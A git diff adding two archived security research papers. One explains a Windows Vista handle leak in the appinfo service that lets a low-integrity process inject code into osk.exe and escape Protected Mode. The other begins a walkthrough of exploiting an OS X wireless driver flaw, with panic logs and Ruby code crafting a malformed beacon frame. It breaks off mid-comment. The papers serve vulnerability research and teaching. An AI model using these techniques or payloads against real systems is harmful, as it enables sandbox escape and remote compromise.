However, there are in fact some +carefully-designed restrictions that are intended to prevent a user (or a +program) from arbitrarily being able to execute custom code with this ability. + +First of all, in order to request special access to send unrestricted keyboard +input, a program's main executable must resolve to a path within the Program +Files or Windows directory. Although the author feels that such a check is +essentially a giant hack at best, it does effectively prevent a "plain user" +running at medium integrity from being able to run custom code that can +synthesize keystrokes to high integrity processes, as a plain user would not +be able to write to any of these directories. Additionally, any such program +must also be signed with a valid digital signature from any trusted code +signing root. This is a fairly useless check from a security perspective, in +the author's opinion, as anybody can pay a code signing authority to get a +code signing certificate in their own name; code signing certificates are not +a guarantee of malware-free (or even bug-free) code. Although it would be +easy to bypass the second check with a payment to a certificate issuing +authority, a plain user cannot so easily bypass the first check relating to +the restriction on where the program main executable may be located. + +Even if a user cannot launch custom code directly as a program with access to +simulate keystrokes to higher integrity processes (known as "uiaccess" +internally), one would tend to get the impression that it would be possible to +simply inject code into a running osk.exe instance (or other process with +uiaccess). This fails as well, however; the process that is responsible for +launching osk.exe (the same broken service that is responsible for launching +the UAC consent user interface, the "Application Information" (appinfo) +service) creates osk.exe with a higher than normal integrity level in order to +use the integrity level security mechanism to block users from being able to +inject code into a process with access to simulate keystrokes. + +When the appinfo service receives a request to launch a program that may +require elevation, which occurs when ShellExecute is called to start a +program, it will inspect the user's token and the application's manifest to +determine what to do. The application manifest can specify that a program +runs with the user's integrity level, that it needs to be elevated (in which +case a consent user interface is launched), that it should be elevated if and +only if the current user is a non-elevated administrator (otherwise the +program is to be launched without elevation), or that the program requests the +ability to perform keystroke simulation to high integrity processes. + +In the case of a launch request for a program requesting uiaccess, +appinfo!RAiLaunchAdminProcess is called to service the request. The process +is then verified to be within the (hardcoded) set of allowed directories by +appinfo!AiCheckSecureApplicationDirectory. After validating that the program +is being launched from within an allowed directory, control is eventually +passed to appinfo!AiLaunchProcess which performs the remaining work necessary +to service the launch request. At this point, due to the "secure" application +directory requirement, it is not possible for a limited user (or a user +running with low integrity, for that matter) to place a custom executable in +any of the "secure" application directories. 
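+
+The following sketch approximates the kind of path restriction just described
+using documented APIs. It is purely illustrative; it is not the actual
+appinfo!AiCheckSecureApplicationDirectory implementation, and the real check
+may canonicalize and compare paths differently.
+
+#include <windows.h>
+#include <shlobj.h>
+#include <wchar.h>
+
+/*
+ * Illustration only: report whether a path begins with the Windows or
+ * Program Files directory, the two "secure" roots described above.
+ */
+BOOL IsUnderSecureDirectory(const WCHAR *path)
+{
+    WCHAR windir[MAX_PATH], progfiles[MAX_PATH];
+
+    GetWindowsDirectoryW(windir, MAX_PATH);
+    SHGetFolderPathW(NULL, CSIDL_PROGRAM_FILES, NULL, SHGFP_TYPE_CURRENT,
+                     progfiles);
+
+    /* A simple case-insensitive prefix comparison against both roots. */
+    return (_wcsnicmp(path, windir,    wcslen(windir))    == 0) ||
+           (_wcsnicmp(path, progfiles, wcslen(progfiles)) == 0);
+}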
+ +Now, the appinfo service is capable of servicing requests from processes of +all integrity levels. Due to this fact, it needs to be capable of determining +the correct integrity level to create a new process from at this point. +Because the new process is not being launched as a full administrator in the +case of a process requesting uiaccess, no consent user interface is displayed +for elevation. However, the appinfo service does still need a way to protect +the new process from any other processes running as that user (as access to +synthesize keystrokes is considered sensitive). For this task, the +appinfo!LUASetUIAToken function is called by appinfo to protect the new +process from other plain user processes running as the calling user. This +is accomplished by adjusting the token that will be used to create the new +process to run at a higher integrity level than the caller, unless the +caller is already at high integrity level (0x3000). The way LUASetUIAToken +does this is to first try to query the linked token associated with the +caller's token. A linked token is a second, shadow token that is assigned +when a computer administrator logs in with UAC enabled; in the UAC case, +the user normally runs as a restricted version of themselves, without their +administrative privileges (or Administrators group membership), and at +medium integrity level. + +If the calling user does indeed have a linked token, LUASetUIAToken retrieves +the integrity level of the linked token for use with the new process. +However, if the user doesn't have a linked token (i.e. they are logged on as a +true plain user and not an administrator running without administrative +privileges), then LUASetUIAToken uses the integrity level of the caller's +token instead of the token linked with the caller's token (in other words, the +elevation token). In the case of a computer administrator this approach would +normally provide sufficient protection, however, for a limited user, there +exists a small snag. Specifically, the integrity level that LUASetUIAToken +has retrieved matches the integrity level of the caller, so the caller would +still have free reign over the process. + +To counteract this issue, there is an additional check baked into +LUASetUIAToken to determine if the integrity level that was selected is at (or +above) high integrity. If the integrity level is lower than high integrity, +LUASetUIAToken adds 16 to the integrity level (although integrity levels are +commonly thought of as just having four values, that is, low, medium, high, +and system, there are 0x1000 unnamed integrity levels in between each named +integrity level). So long as the numeric value of the integrity level chosen +is greater than the caller's integrity level, the new process will be +protected from the caller. In the case of the caller already being a full, +elevated administrator, there's nothing to protect against, so LUASetUIAccess +doesn't attempt to raise the integrity level above high integrity. + +After determining a final integrity level, LUASetUIAToken changes the +integrity level in the token that will be used to launch the new process to +match the desired integrity level. At this point, appinfo is ready to create +the process. If needed, the user profile block is loaded and an environment +block is created, following which advapi32!CreateProcessAsUser is called to +launch the uiaccess-enabled application for the caller with a raised integrity +level. 
After the process is created, the output parameters of
+CreateProcessAsUser are marshalled back into the caller's process, and
+AiLaunchProcess signals successful completion to the caller.
+
+If one has been following along so far, the question of ``How does all of this
+relate to Internet Explorer Protected Mode'' has probably crossed one's mind.
+It turns out that there's a slight deficiency in the protocol outlined above
+with respect to creating uiaccess processes. The problem lies in the fact
+that AiLaunchProcess returns the output parameters of CreateProcessAsUser back
+to the caller's process. This is dangerous, because in the Windows security
+model, security checks are done when one attempts to open a handle; after a
+handle is opened, the access rights requested are forever more associated with
+that handle, regardless of who uses the handle. In the case of appinfo, this
+turns out to be a real problem because appinfo, being the creator of the new
+process, is handed back a thread and process handle that grant full access to
+the new thread and process, respectively. Appinfo then marshals these handles
+back to the caller (which may be running at low integrity level). At this
+point, a privilege escalation problem has occurred; the caller has been
+essentially handed the keys to a higher integrity process. While the caller
+would never normally be able to open a handle to the new process on its own,
+in this case, it doesn't have to, as the appinfo service does so on its behalf
+and returns the handles back to it.
+
+Now, in the ShellExecute case, the client stub for the appinfo
+AiLaunchAdminProcess routine doesn't want (or need) the process or thread
+handles, and closes them immediately afterwards. However, this is obviously
+not a security barrier, as this code is running in the untrusted process and
+could be patched out. As such, there exists a privilege escalation hole of
+sorts with the appinfo service. It can be abused to, without user interaction,
+leak a handle to a higher integrity process to a low integrity process (such
+as Internet Explorer when operating in Protected Mode). Furthermore, even
+Internet Explorer in Protected Mode, running at low integrity, can request to
+launch an already-existing uiaccess-flagged executable, such as osk.exe (which
+is conveniently already in a "secure" application directory, the Windows
+system directory). With a process and thread handle as returned by appinfo,
+it is possible to inject code into the new process, and from there, as they
+say, the rest is history.
+
+4) Caveats
+
+Although the problem outlined in this article is indeed a privilege escalation
+hole, there are some limitations to it. First of all, if the caller is
+running as a plain user instead of a non-elevated administrator, appinfo
+creates the uiaccess process with integrity level 0x1010 (low integrity + 16).
+This is still less than medium integrity (0x2000), and thus in the true
+limited user case, the new process, while protected from other low integrity
+processes, is still unable to interfere with medium integrity processes
+directly.
+
+In the case where a user is running as an administrator but is not elevated
+(which happens to be the default case for most Windows Vista users), it is
+true that the appinfo service returns a handle to a process running at high
+integrity level. However, only the integrity level is changed; the process is
+most certainly not an administrator (and in fact has BUILTIN\Administrators as
+a deny only SID). 
This does mean, though, that the new process is quite capable of
+injecting code into any processes the user has started (with zero user
+interaction). If the user happens to already have a high integrity process
+running on the desktop as a full administrator, the new process could be used
+to attack it as the process would be running at the same integrity level and
+it would additionally be running as the same user. This means that in the
+default configuration, this issue can be used to escape from Protected Mode,
+but one is still not given full-blown administrative access to the system.
+However, any location in the user profile directory could be written to. This
+effectively eliminates the security benefit of Protected Mode for a
+non-elevated administrator (with respect to treating the user as a plain
+user).
+
+Source code to a simple program to demonstrate the appinfo service issue is
+included with the article. The problem is at this point expected to be fixed
+by Windows Vista Service Pack 1 and Windows Server 2008 RTM. The sample code
+launches osk.exe with ShellExecute, patches out the CloseHandle calls in
+ShellExecute to retain the process and thread handles, and then injects a
+thread into osk.exe that launches cmd.exe. The sample program also includes a
+facility to create a low integrity process to verify correct function; the
+intended use is to launch a low integrity command shell, verify that
+directories such as the user profile directory cannot be written to, and then
+use the sample program from the low integrity process to launch a medium
+integrity cmd.exe instance without user interaction, which does indeed have
+free rein over the user profile directory. The same code will operate in the
+context of Internet Explorer in Protected Mode, although in the interest of
+keeping the example clear and concise, the author has not included code to
+inject the sample program in some form into Internet Explorer (which would
+simulate an attack on the browser).
+
+Note that while the uiaccess process is launched as a high integrity process,
+it is configured such that unless a token is explicitly provided that requests
+high integrity, new child processes of the uiaccess process will launch as
+medium integrity processes. It is possible to work around this issue and
+retain high integrity with the use of CreateProcessAsUser by code injected
+into the uiaccess process if desired. However, as described above, simply
+retaining high integrity does not provide administrative access on its own.
+If there are no other high integrity processes running as the current user on
+the current desktop, running as high integrity and running as medium integrity
+with the non-elevated token are functionally equivalent, for all intents and
+purposes.
+
+5) Conclusion
+
+UAC, Internet Explorer Protected Mode, and the integrity level model represent
+an entirely new way of thinking about security in the Windows world.
+Traditionally, Windows security has been a user-based model, where all
+processes that execute as a user were considered equally trusted. Windows
+Vista and Windows Server 2008 are the first steps towards changing this model
+to support the concept of an untrusted process (as opposed to an untrusted
+user). While this has the potential to significantly benefit end user
+security, as is the case with Internet Explorer Protected Mode, there are
+bound to be bumps along the way. Writing an integrity level broker process is
+difficult. 
It is very easy to make simple mistakes that compromise the +security of the integrity level mechanism, as the appinfo issue highlights. +The author would like to think that by shedding light on this type of +programming error, future issues of a similar vein may be prevented before +they reach end users. diff --git a/uninformed/8.4.txt b/uninformed/8.4.txt new file mode 100644 index 0000000..b85ae04 --- /dev/null +++ b/uninformed/8.4.txt @@ -0,0 +1,1383 @@ +OS X Kernel-mode Exploitation in a Weekend +September, 2007 +David Maynor +dave@erratasec.com +http://www.erratasec.com/ + +Abstract: Apple's Mac OS X operating system is attracting more +attention from users and security researchers alike. Despite this increased +interest, there is still an apparent lack of detailed vulnerability +development information for OS X. This paper will attempt to help bridge this +gap by walking through the entire vulnerability development process. This +process starts with vulnerability discovery and ultimately finished with a +remote code execution. To help illustrate this process, a real vulnerability +found in the OS X wireless device driver is used. + +1) Introduction + +OS X has a strange place in the hearts and the minds of the research +community. Security researchers, like most other users, enjoy a well-built and +reliable hardware platform topped off by an operating system with a slick +interface. Switch gears from the users experience to a more research-oriented +focus and problems start to appear. Researchers have historically explored +and documented internals of operating systems like Microsoft's Windows and +open source counterparts such as Linux and BSD variants. The knowledge gaps +for OS X are in no way a show stopper for researching security vulnerabilities +on OS X; still, they prove to be a frustrating speed bump. While static +analysis of binaries in a Windows environment may be trivial, the same +cannot be said to be true on OS X. This document contains information +collected from a variety of sources after discovering a flaw in a wireless +device driver for OS X. + +Before the accidental discovery of the wireless flaw, the author knew next to +nothing about the internals of OS X, the ``xnu'' kernel. Google, in a rare +failure, also provided next to no help. All the articles the author +encountered only narrowly covered a topic without talking about how one could +go about building a useful research environment. Many of these articles +talked about something each respective author discovered without showing how +others could rediscover it. For this reason, the author includes tips +throughout this paper in the form of sections entitled ``Things I wish Google +told me''. + +The Test Network + +Many elements are required when finding and duplicating a wireless +vulnerability. Since the target for the attack described in this paper is +running the OS X operating system, at least two OS X machines are needed for +kernel debugging with gdb (the ``GNU Debugger''). A third computer with a +D-Link WDA-2320 Atheros based card is used as the attacking machine. The +attacking machine uses a small Linux based distribution that runs from a CD +called BackTrack2. BackTrack2 is used because it includes many special 802.11 +drivers that are capable of raw packet injection, a feature that most wifi +drivers (frustratingly) lack. + +The author's initial research on the subject described in this paper made use +of a patched version of ``Madwifi-old'' with LORCON. 
Madwifi is the name of +the open-source drivers for chipsets from Atheros. LORCON is a wifi fuzzing +tool written by Josh Wright. Since quick and flexible packet generation is +important, the original tool used for this research was ``scapy'', a packet +creation engine written in Python. The examples in this paper, written almost +one year later, make use of the Metasploit LORCON integration and are written +in Ruby. + +To help provide some perspective on the research environment used in this +document, the following three machine configurations should be referenced: + +Target Machine + +Hardware: Mac Mini, 1.66Ghz, 512MB RAM +OS Version: 10.4.7 +IP Address: 192.168.1.20 +Role: The target machine is the victim in the testing scenario. It is running +a vulnerable version of the OS X Atheros driver. + +Dev Machine + +Hardware: Macbook, 2GHz Intel Core Duo, 1 GB RAM +OS Version: 10.4.7 +IP Address: 192.168.1.1 +Role: This machine runs gdb for connection to the target machine. It is also +setup as a core dump server, but that functionality appears broken. This box +will also archive the panic logs and register information along with stack +traces. This is the primary machine for single step debugging. + +Attack Machine + +Hardware: Generic shuttle PC, Pentium 3, 512MB RAM +OS Version: Backtrack2 Bootable Linux CD +IP Address: 192.168.1.50 +Role: This is the attacking machine. The attack initially launched from a Dell +Laptop with a PCMCIA card. This machine is close to the same specifications +with an Atheros based D-Link card. The attacks are in Ruby using the +Metasploit framework integration with LORCON. + +2) Vulnerability Discovery + +One of the major staples in a researcher's toolbox is binary analysis (where +``binary'' refers to compiled software code). Vulnerability research and +discovery on OS X is no different in this regard. However, performing binary +analysis on OS X requires some understanding of the underlying binary file +format that is used. On OS X, Apple uses a universal binary file format +called a Mach-O. In this context, a universal binary will execute on both +Intel and PPC based machines. It accomplishes this by combining a compiled +binary version of the program for each processor in an archive like format +with a header that contains specific information relating to each processor +type. The universal binary header is detected at runtime causing the correct +compiled code for the platform to execute. + +Although universal binaries provide an elegant solution for an operating +system that supports multiple architectures, it leads to problems when +performing binary analysis because not many tools support the file format at +the time of this writing. Recently, IDA Pro added support for the binary +format in 5.1. Prior to 5.1, reversing a universal binary required manual +manipulation or scripting in an IDC. + + Things I wish Google Told me: Disassembling OS X binaries + + Apple provides tools that support the manipulation of universal binaries which + are capable of creating a simplified binary suitable for hassle free loading + into IDA Pro. One of these tools, ``lipo'', allows a researcher to extract the + relevant chunk of compiled code from a universal binary. The following gives + a quick example of using lipo on the Atheros driver from OS X 10.4.7. This + will create a thin file called at.i386 that is suitable for loading into IDA + Pro without the confusing archive headers and with the older PowerPC code. 
+ + lipo -thin i386 AirPortAtheros5424 -output at.i386 + +The vulnerability featured in this paper is a flaw in Apple's wireless device +driver. This flaw was discovered through ``beacon'' and ``probe response'' +fuzzing. Beacons are the packets that wireless access points broadcast +several times a second to announce their presence to the world. They are also +the packets that your notebook computer uses in order to build a list of +nearby access-points. Probe-responses are similar packets that are used when +a notebook computer probes for access points that are not otherwise +broadcasting. + +The bug described in this paper was found by the author while performing +fuzzing experiments against other machines. During this time, one of the +Macbooks in the vicinity running OS X 10.4.6 crashed unexpectedly. This crash +produced a file called panic.log in /Library/Logs. A panic.log file contains +information to help debug a kernel panic or crash on OS X. This includes the +output of all the registers, a stack trace and the load address of the +offending module and the address of its dependent modules. This information +provides a great starting place to help track down a driver problem. However, +in its default form, there are several shortcomings. The most apparent +shortcoming is that the stack trace does not include symbol information. As +such, one sees addresses rather than function names. In order to begin to +track down a problem, one needs to do some basic math to manually discover the +names of the functions. Luckily, the loading offsets did not change much on +the test machine when reproducing this issue. + +The following output shows an example panic.log: + +panic(cpu 0 caller 0x0019CADF): +Unresolved kernel trap (CPU 0, Type 14=pagefault), registers: +CR0: 0x8001003b, CR2: 0x62413863, CR3: 0x021d7000, CR4: 0x000006e0 +EAX: 0x62413862, EBX: 0x00000003, ECX: 0x0c67bc8c, EDX: 0x00000003 +ESP: 0x62413863, EBP: 0x0c67bad4, ESI: 0x03717804, EDI: 0x0371787c +EFL: 0x00010202, EIP: 0x008c923d, CS: 0x00000008, DS: 0x0c670010 + +Backtrace, Format - Frame : Return Address (4 potential args on stack) +0xc67b954 : 0x128b5e (0x3bc46c 0xc67b978 0x131bbc 0x0) +0xc67b994 : 0x19cadf (0x3c18e4 0x0 0xe 0x3c169c) +0xc67ba44 : 0x197c7d (0xc67ba58 0xc67bad4 0x8c923d 0x48) +0xc67ba50 : 0x8c923d (0x48 0x10 0x1e200010 0xc670010) +0xc67bad4 : 0x8c7303 (0x371787c 0x1e202d0d 0x8 0x5) +0xc67bb24 : 0x8bccb9 (0x3699804 0xc67bc8c 0x1e202800 0x80) +0xc67bb84 : 0x8cd799 (0x369b46c 0xc67bc8c 0x1e202800 0x80) +0xc67bce4 : 0x8ddbd9 (0x369b46c 0x1e20cb00 0x36bbc04 0x80) +0xc67bd34 : 0x8ce9a5 (0x369b46c 0x1e20cb00 0x36bbc04 0x80) +0xc67be24 : 0x8de86a (0x369b46c 0x1e20cb00 0x36bbc04 0x46) +0xc67bf14 : 0x38dd6d (0x369b29c 0x354d080 0x1 0x36a7e58) +0xc67bf64 : 0x38cf19 (0x354d080 0x135d18 0x0 0x36a7e58) +0xc67bf94 : 0x38cc3d (0x3575140 0x3575140 0x0 0x450) +0xc67bfd4 : 0x197b19 (0x3575140 0x0 0x36a80d0 0x3) +Backtrace terminated-invalid frame pointer 0x0 + Kernel loadable modules in backtrace (with dependencies): + com.apple.driver.AirPortAtheros5424(104.1)@0x8bb000 + dependency: com.apple.iokit.IONetworkingFamily(1.5.0)@0x672000 + dependency: com.apple.iokit.IOPCIFamily(2.0)@0x563000 + dependency: com.apple.iokit.IO80211Family(112.1)@0x8a2000 + +When an OS X driver is loaded into IDA, the offsets are all relative to 0. In +order to find the address where a kernel driver crashed you subtract the last +address associated with the module from the stack trace from the module load +address. 
You then subtract 0x1000 from the result because kernel modules are +loaded in a page aligned fashioned. Here is a typical panic.log from +/Library/Logs created for this example. + +panic(cpu 1 caller 0x0019CADF): +Unresolved kernel trap (CPU 1, Type 14=pagefault), registers: +CR0: 0x80010033, CR2: 0x00000004, CR3: 0x02209000, CR4: 0x000006a0 +EAX: 0x00000000, EBX: 0x00111111, ECX: 0x000005c3, EDX: 0x00000039 +ESP: 0x00000004, EBP: 0x0c74b758, ESI: 0x00111111, EDI: 0x0345bbf0 +EFL: 0x00010206, EIP: 0x0090df95, CS: 0x00000008, DS: 0x03a10010 + +Backtrace, Format - Frame : Return Address (4 potential args on stack) +0xc74b5d8 : 0x128b5e (0x3bc46c 0xc74b5fc 0x131bbc 0x0) +0xc74b618 : 0x19cadf (0x3c18e4 0x1 0xe 0x3c169c) +0xc74b6c8 : 0x197c7d (0xc74b6dc 0xc74b758 0x90df95 0x110048) +0xc74b6d4 : 0x90df95 (0x110048 0x2920010 0x10 0x3a10010) +0xc74b758 : 0x8f2083 (0x345a000 0x111111 0xc74b778 0x800016c3) +0xc74b7a8 : 0x9112b7 (0x36d5804 0x90df78 0x345a000 0x3a1f5a5) +0xc74b7c8 : 0x9115b9 (0x345a000 0x345a46c 0x345bdb8 0x196fc1) +0xc74b808 : 0x8dec91 (0x345a000 0x36d6800 0xc74b828 0x0) +0xc74ba08 : 0x8d600c (0x368a360 0x3a1f5a5 0x6 0x339c91) +0xc74bcb8 : 0x38e698 (0x345a000 0x8 0x3a1f5a5 0x0) +0xc74bcf8 : 0x8d5284 (0x35aa900 0x8d5c7c 0x8 0x3a1f5a5) +0xc74bd38 : 0x3a3d5c (0x345a000 0x8 0x3a1f5a5 0x0) +0xc74bd88 : 0x18a83d (0x36f8d00 0x0 0x3a1f5a4 0x22) +0xc74bdd8 : 0x12b389 (0x3a1f57c 0x39c756c 0x0 0x0) +0xc74be18 : 0x124902 (0x3a1f500 0x0 0x50 0xc74befc) +0xc74bf28 : 0x193034 (0xc74bf54 0x0 0x0 0x0) Backtrace continues... + Kernel loadable modules in backtrace (with dependencies): + com.apple.driver.AirPortAtheros5424(104.1)@0x8e7000 + dependency: com.apple.iokit.IONetworkingFamily(1.5.0)@0x873000 + dependency: com.apple.iokit.IOPCIFamily(2.0)@0x57e000 + dependency: com.apple.iokit.IO80211Family(112.1)@0x8ce000 + com.apple.iokit.IO80211Family(112.1)@0x8ce000 + dependency: com.apple.iokit.IONetworkingFamily(1.5.0)@0x873000 + dependency: com.apple.iokit.IOPCIFamily(2.0)@0x57e000 + +Kernel version: +Darwin Kernel Version 8.7.1: Wed Jun 7 16:19:56 PDT 2006; + root:xnu-792.9.72.obj~2/RELEASE_I386 + +The AirPort Atheros module has a load address of 0x8e7000 which rules out the +first three entries in the stack trace as being found within this driver. The +fourth entry, 0x90df95, is within the range of the driver. By performing a +few quick calculations, it is possible to calculate the relative offset into +the associated driver's binary: + + 0x90df95 +- 0x8e7000 +- 0x1000 = 0x25f95 + +Opening the driver in IDA Pro and then jumping to offset 0x25f95 will yield +the following code from athcopyscanresults: + +__text:00025F87 mov esi, [ebp+arg_4] +__text:00025F8A mov edi, eax +__text:00025F8C add edi, 1BF0h +__text:00025F92 mov eax, [esi+60h] +__text:00025F95 movzx ecx, byte ptr [eax+4] +__text:00025F99 mov eax, ecx +__text:00025F9B shr al, 3 + +Looking at this crash log, one of the first lines quickly gives insight into +how to analyze this dump: + +panic(cpu 1 caller 0x0019CADF): Unresolved kernel trap (CPU 1, Type 14=pagefault) + +A page fault usually means that some code tried to access an invalid address. +In a case such as this, the CR2 register (shown with the gdb with info +registers) will contain the offending address Intel processors contain a whole +set of non general-purpose registers like CR2 that are used for hardware and +driver debugging. These are registers that one would not normally interact +with when debugging userland code. In this case, the offending address is +0x00000004. 
Looking at the instruction that causes the page fault, one can
+see a dereference of EAX: movzx ecx, byte ptr [eax+4]. The EAX register is
+zero, so the value of CR2 came from the machine adding 4 to the address in
+EAX. By looking at the binary values, one can determine that this panic log
+was caused by a NULL pointer dereference in the wireless device driver.
+Although it is a bit out of scope for this document, the three addresses
+that precede the Atheros address in the stack trace are:
+
+0x128b5e panic
+0x19cadf panic_trap
+0x197c7d trap_from_kernel
+
+When performing OS X kernel auditing and exploit development, these three
+addresses will become a very familiar sight in a panic log, so get used to
+ignoring the first three and starting at the fourth address.
+
+3) The Flaw
+
+Standard exploit development techniques rarely work well when applied to
+kernel-level vulnerabilities. The kernel environment is much less friendly to
+the exploit writer than user mode. Each specific vulnerability will likely
+require custom techniques. The flaw described in the previous chapter was
+found in the driver provided by Apple in their Mac OS X version 10.4.7 on
+Macbooks and Mac Minis running on an Intel processor. This flaw allows an
+attacker to compromise and gain complete control of a targeted machine. Since
+the flaw requires a targeted machine to receive and process a wireless
+management frame, the attacker must be within range in order to transmit the
+frame. In addition, OS X discards valid frames with a weak signal, so the
+attacker has to be especially close to the victim machine.
+
+As was described above, this flaw was discovered accidentally while fuzz
+testing other devices. The ``scapy'' fuzzing tool was used to generate
+wireless management frames with a random number of Information Elements (IEs)
+of random sizes that were then transmitted to the broadcast address. The
+beacon packets sent by access points contain a number of variable-length IEs
+such as the advertising SSID, the list of supported speeds, the country it
+works in, authentication information, channels, time, timezone, and
+vendor-specific information, such as how to find the music shared by your
+Zune media player.
+The Macbook crashed due to a page fault caused by the wireless driver during
+the processing of one of these fuzz packets. The panic log showed arbitrary
+memory corruption in the form of overwritten source or destination values
+for copies in memory. Three crash dumps, which are described below, clearly
+show that memory was corrupted during the handling of these fuzz packets. 
+ +Example 1: Attempt to access 0x62413863: + +panic(cpu 0 caller 0x0019CADF): +Unresolved kernel trap (CPU 0, Type 14=pagefault), registers: +CR0: 0x8001003b, CR2: 0x62413863, CR3: 0x021d7000, CR4: 0x000006e0 +EAX: 0x62413862, EBX: 0x00000003, ECX: 0x0c67bc8c, EDX: 0x00000003 +ESP: 0x62413863, EBP: 0x0c67bad4, ESI: 0x03717804, EDI: 0x0371787c +EFL: 0x00010202, EIP: 0x008c923d, CS: 0x00000008, DS: 0x0c670010 + +#3 0x00197c7d in trap_from_kernel () +#4 0x008c923d in ieee80211_saveie () +#5 0x008c7303 in sta_add () +#6 0x008bccb9 in ieee80211_add_scan () +#7 0x008cd799 in ieee80211_recv_mgmt () +#8 0x008ddbd9 in ath_recv_mgmt () +#9 0x008ce9a5 in ieee80211_input () +#10 0x008de86a in ath_intr () + +Example 2: Attempt to access 0xcc + +panic(cpu 1 caller 0x0019CADF): +Unresolved kernel trap (CPU 1, Type 14=pagefault), registers: +CR0: 0x8001003b, CR2: 0x000000cc, CR3: 0x021d7000, CR4: 0x000006a0 +EAX: 0x00000033, EBX: 0x037d8504, ECX: 0x036a4c78, EDX: 0x0360b610 +ESP: 0x000000cc, EBP: 0x0c6ebea4, ESI: 0x037d8504, EDI: 0x0369b46c +EFL: 0x00010206, EIP: 0x008c5f03, CS: 0x00000008, DS: 0x00000010 + +#3 0x00197c7d in trap_from_kernel () +#4 0x008c5f03 in sta_update_notseen () +#5 0x008c6ba0 in sta_pick_bss () +#6 0x008bd77c in scan_next () +#7 0x008bc314 in thread_call_func () + +Example 3: Attempt to copy from 0x41316341 + +eax 0xaca7000 181039104 +ecx 0xc98 3224 +edx 0x3263 12899 +ebx 0xf 15 +esp 0xc6e3714 0xc6e3714 +ebp 0xc6e3758 0xc6e3758 +esi 0x41316341 1093755713 +edi 0xaca7000 181039104 +eip 0x1933de 0x1933de +eflags 0x10203 66051 +cs 0x8 8 +ss 0x10 16 +ds 0x120010 1179664 +es 0xc6e0010 208535568 +fs 0x10 16 +gs 0x900048 9437256 +Program received signal SIGTRAP, Trace/breakpoint trap. +0x001933de in memcpy_common () +2: x/i $eip 0x1933de : repz movs DWORD PTR es:[edi],DWORD PTR ds:[esi] +#0 0x001933de in memcpy_common () +#1 0x03915004 in ?? () +#2 0x008c6083 in sta_iterate () +#3 0x008e52b7 in AirPort_Athr5424::ieee80211_notify_scan_done () +#4 0x008e55b9 in AirPort_Athr5424::setSCAN_REQ () +#5 0x008b2c91 in IO80211Scanner::scan () +#6 0x008aa00c in IO80211Controller::execCommand () +#7 0x0038e698 in IOCommandGate::runAction (this=0x3595300, +inAction=0x8a9c7c , arg0=0x8, arg1=0x399aea5, arg2=0x0, arg3=0xc6e3d2c) at +/SourceCache/xnu/xnu-792.9.72/iokit/Kernel/IOCommandGate.cpp:152 +#8 0x008a9284 in IO80211Controller::queueCommand () + +Tracking down the packet that crashes a wireless driver can be frustrating +because it's not necessarily the last packet to be received or transmitted. +This is important when the number of packets produced and injected can be as +many as several thousands per minute. Since the memory overwrites illustrated +above cover an entire 32 bit value, like 0x41414141, a method to tag which +packet number is responsible for the overwrite can help to cut down on this +frustration. + +A counter for packet tracking can be inserted into packets when at generation +time. There are a few specific places where storing this counter can help +with packet identification. The first place is the last 4 bytes of a BSSID +with the first two bytes remaining static. For example, 0xcc 0xcc 0x41 0x41 +0x41 0x01 is the BSSID of the first packet sent. When the last byte of the +MAC address reaches 0xff the next higher byte starts counting. As such, 0xcc +0xcc 0x41 0x41 0x01 0x01 is the BSSID for the 256th packet sent. Likewise, +the fuzzer can pad the information-element buffer in the same way with a +repeating pattern of 0x41 0x41 0x41 0x01 for the first packet sent. 
The reason
+for padding the values with extra data instead of just setting them to
+0x00 is related to the page faults. While 0x41 0x41 0x41 0xf1 may
+translate to a bad address and cause a page fault during access attempts,
+0x00 0x00 0x43 0x12 may be valid and cause no problems. Since kernel
+panics are the primary means of isolating the flaw at this point, they
+need to cause a crash instead of silently allowing the kernel to continue
+executing.
+
+Several tests reveal that the only anomaly common to all the packets that
+cause an overwrite is an overly long Extended Rate element, which is an IE
+sent by the access point to advertise additional speeds, such as 11mbps, that
+the access point supports. To verify this, the author changed the script so
+that it would generate a distinctive pattern in the Extended Rate IE. This
+pattern showing up in the crash dumps made it possible to prove that it was
+the ``Extended Rate'' IE that was the problem. The amount of the pattern found
+in memory made it easy to determine how much memory was corrupted. The
+following Ruby code shows how the packet that made it possible to come to
+this conclusion was crafted:
+
+ssid = Rex::Text.rand_text_alphanumeric(rand(255))
+bssid = "\x61\x61\x61" + Rex::Text.rand_text(3)
+seq = [rand(255)].pack('n')
+xrate = Rex::Text.rand_pattern_create(240)
+# channel is assumed to be defined earlier in the full fuzzing script
+ frame =
+ "\x80" +
+ "\x00" +
+ "\x00\x00" +
+ "\xff\xff\xff\xff\xff\xff" +
+ bssid +
+ bssid +
+ seq +
+ Rex::Text.rand_text(8) +
+ "\xff\xff" +
+ Rex::Text.rand_text(2) +
+
+ #ssid tag
+ "\x00" + ssid.length.chr + ssid +
+
+ #supported rates
+ "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +
+
+ #current channel
+ "\x03" + "\x01" + channel.chr +
+
+ #Xrate
+ "\x32" + xrate.length.chr + xrate
+
+When this packet is transmitted, the victim machine will not crash right away.
+The vulnerable code does not process the packets the instant they are
+received. The packets are instead only processed when the information is
+needed for a scan. OS X produces a new scan every five minutes. As such, the
+machine may take up to five minutes to crash after receiving a corrupted
+packet. Pinning down this bug meant that forcing a scan would be necessary.
+
+As luck would have it, Apple provides a tool called airport for this sort of
+thing (located in
+/System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources).
+Executing airport -z will disassociate the machine from whatever wireless
+access point it is currently using. Executing airport -s will force the
+driver to run a scan and report all access points within range. In order to
+crash the machine quickly after a corrupted Extended Rate IE is sent, the
+author ran the command airport -s -r 10000. The ``-r'' option tells the
+airport command to repeat an action a given number of times which, in this
+case, causes 10000 re-scans.
+
+Running this command would cause the machine to reliably crash in the same
+manner every time. This makes it possible to figure out where, precisely, the
+wireless driver is crashing. In this case, the corrupted IE in the packet
+that is transmitted causes a crash in a memcpy called from a function named
+athcopyscanresults in the Apple driver. It appears that the attacker can
+influence where the memcpy will read from and how much data will be copied.
+Since an attacker can copy arbitrary data from one area of memory (such as the
+packet) to another area of memory, it will most likely be possible to gain
+code execution. 
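+
+Before digging into the driver itself, it helps to sketch the general shape
+of the suspected bug. The structure and constant names below are borrowed
+from the open-source net80211 code examined in the next section; the code
+itself is illustrative only and is not Apple's implementation.
+
+#include <stdint.h>
+#include <string.h>
+
+#define IEEE80211_RATE_MAXSIZE 15
+
+/*
+ * An 802.11 information element is ie[0] = id, ie[1] = length, followed
+ * by 'length' bytes of data. Copying an element into a fixed-size field
+ * without validating ie[1] lets a beacon carrying an oversized Extended
+ * Rate IE overwrite whatever follows the field in memory.
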